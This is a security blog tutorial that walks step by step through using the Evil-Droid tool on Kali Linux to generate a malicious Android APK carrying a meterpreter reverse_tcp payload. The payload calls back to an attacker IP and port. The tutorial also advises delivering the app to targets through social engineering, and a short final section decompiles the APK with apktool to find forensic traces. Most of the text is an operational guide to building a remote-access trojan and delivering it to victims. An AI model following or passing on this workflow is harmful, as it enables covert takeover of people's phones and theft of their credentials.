Android is an open source platform where any individual developer can implement ideas into an android application. It’s an big advantage for android developers as well as users who can use tons of applications according to their needs. Android do offers many features but the most vulnerable also. Android do have lot of vulnerabilities which gives an attacker advantage to steal credentials of the target. According to CVE (Common Vulnerability Exposures) android have many vulnerabilities which can be used to bypass android security was demonstrated in the ethical hacking courses offered by International Institute of Cyber Security.
CVE shows many vulnerabilities which are mostly used by attackers. Today we will show a tool called Evil Droid which is used to create different payloads to compromise android device. Ethical hacking researcher of international institute of cyber security says this Evil-droid can be used to generates malicious apk to penetrate android devices.
- Evil-Droid has been installed on Kali Linux 2018.4 amd64.
- For cloning type git clone https://github.com/M4sc3r4n0/Evil-Droid.git
- Type cd Evil-Droid
- Type chmod u+x evil-droid
- Type ./evil-droid
======================SNIP========================
- Type 1
- To start APK MSF
- Type local IP address (attacker’s IP address) Type 192.168.1.5
- Type port number to listen Type 4444
- Type malicious apk name. Type testapk
- Select android/meterpreter/reverse_tcp
- Select Multi handler
- Then click on OK
- Evil-droid has created the malicious app. Now you can send app using to the target by social engineering.
- For testing we have used Android 4.4 iso. Download Android 4.4 from : https://sourceforge.net/projects/android-x86/files/latest/download
- We have started live boot in Vmware workstation.
- Install the malicious test apk into the android 4.4
- Before installing it will ask for to accept unknown sources to be on. Turn on Unknown sources & then install test.apk
- As test.apk is opened in the android.
- A session will be created in Evil-droid listener. Another terminal will open automatically for creating & running session.
- Evil-droid meterpreter offers same commands as metasploit meterpreter has. You can eaisly manipulate your target.
- For another testing we have used Android 7.1 iso.
Download Android 7.1 from : https://osdn.net/projects/android-x86/downloads/67834/android-x86_64-7.1-r2.iso/ - We have started live boot in Vmware workstation.
- Install the malicious test apk into the android 7.1
- Before installing it will ask for to accept unknown sources to be on. Turn on Unknown sources & then install test.apk.
- As test.apk is opened in the android.
- A session will be created in Evil-droid listener.
- Another terminal will open automatically for creating & running session.
- Evil-droid meterpreter offers same commands as metasploit meterpreter has. You can eaisly manipulate your target.
Same exploitation to android devices can be done using FATRAT, to understand how it works follow to hack windows android mac using thefatrat step by step tutorial
Reversing Mailcious Apk Generated by Evil-Droid :-
For doing reverse engineering of any android application there are various tools which are used to decompile APKs, according to ethical hacking expert. But most popular decompiler known as apktool which is used to decompile android applications. We have used apktool which comes pre-installed in Kali Linux 2018.4 (amd64).
- Open another terminal type apktool -h
root@kali:/home/iicybersecurity/Downloads/Evil-Droid/evil/smali/com/jpzqkxcarh/zsehpukvxy# apktool -h
Unrecognized option: -h
Apktool v2.2.2 - a tool for reengineering Android apk files
with smali v2.1.3 and baksmali v2.1.3
Copyright 2014 Ryszard Wiśniewski brut.alll@gmail.com
Updated by Connor Tumbleson connor.tumbleson@gmail.com
usage: apktool
-advance,--advanced prints advance information.
-version,--version prints the version then exits
usage: apktool if|install-framework [options]
-p,--frame-path
Stores framework files into .
-t,--tag Tag frameworks using .
usage: apktool d[ecode] [options]
-f,--force Force delete destination directory.
- Type apktool d evil.apk
root@kali:/home/iicybersecurity/Downloads/Evil-Droid# apktool d evil.apk
I: Using Apktool 2.2.2 on evil.apk
I: Loading resource table…
I: Decoding AndroidManifest.xml with resources…
I: Loading resource table from file:
I: Regular manifest package…
I: Decoding file-resources…
I: Decoding values / XMLs…
I: Baksmaling classes.dex…
I: Copying assets and libs…
I: Copying unknown files…
I: Copying original files…/root/.local/share/apktool/framework/1.apk
- After executing the above query apktool has extracted malicious apk into set of XMLs. These XMLs are used in forensics.
- When we analyze further we found that malicious apk created directories with jumbled/random alphabets names. If you scan any normal application it will not create any random directories with such names. This behavior shows the presence of malicious apk.
root@kali:/home/iicybersecurity/Downloads/Evil-Droid# cd /evil/smali/com
root@kali:/home/iicybersecurity/Downloads/Evil-Droid/evil/smali/com# ls
jpzqkxcarh
Cyber Security Researcher. Information security specialist, currently working as risk infrastructure specialist & investigator. He is a cyber-security researcher with over 25 years of experience. He has served with the Intelligence Agency as a Senior Intelligence Officer. He has also worked with Google and Citrix in development of cyber security solutions. He has aided the government and many federal agencies in thwarting many cyber crimes. He has been writing for us in his free time since last 5 years.